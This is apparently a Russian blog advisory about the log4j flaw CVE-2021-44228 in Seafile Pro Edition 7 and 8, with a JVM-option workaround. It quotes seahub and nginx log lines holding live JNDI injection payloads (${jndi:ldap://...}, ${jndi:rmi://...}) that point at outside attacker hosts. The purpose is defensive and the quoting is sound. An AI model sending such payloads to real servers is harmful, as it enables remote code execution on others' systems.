Профессиональная версия Seafile Pro Edition 7 и 8 уязвима для атак log4j (CVE-2021-44228) из-за использование Elastic Search 5.6. Для того,чтобы воспользоваться уязвимостью, злоумышленнику потребуется учётная запись с доступом к полнотекстовой поисковой строке или к API.
Пока не вышла новая версия, есть workaround. Редактируем seafile-server-latest/pro/elasticsearch/config/jvm.options:
-Dlog4j2.formatMsgNoLookups=true
Альтернативный вариант — отключить полнотекстовый поиск.
Примеры атак в логе seahub.log:
2021-12-11 11:35:27,421 [WARNING] django.request:152 get_response Not Found: /${jndi:ldap://85.10.195.175:80/ye}
2021-12-11 13:26:24,007 [WARNING] django.request:152 get_response Not Found: /${jndi:ldaps://852df20d.probe001.log4j.leakix.net:9200/b}
2021-12-11 13:43:10,039 [WARNING] django.request:152 get_response Not Found: /${jndi:ldap://185.244.214.217:57715/1}${jndi:ldap://185.244.214.217:57715/2}${jndi:ldap://185.244.214.217:57715/3}
В nginx:
138.68.167.19 - - [10/Dec/2021:19:33:44 +0100] "GET / HTTP/1.1" 400 248 "-" "${jndi:rmi://134.209.163.248:80/Z}" "-"
138.68.167.19 - - [10/Dec/2021:19:33:45 +0100] "GET /favicon.ico HTTP/1.1" 400 248 "-" "${jndi:rmi://134.209.163.248:80/Z}" "-"
147.182.154.100 - - [10/Dec/2021:21:03:28 +0100] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://a8fvkc.dnslog.cn/a}" "-"
Ссылки
URGENT! Zero-Day-Exploit in log4j
P.S.
Общедоступная версия Seafile Community Edition не подвержена уязвимости, в ней не используется Elastic Search.
Источник:
https://internet-lab.ru/seafile_pro_log4j
Если вам понравилась статья, то ставьте 👍🏻 каналу.
Пишите комментарии, задавайте вопросы, подписывайтесь.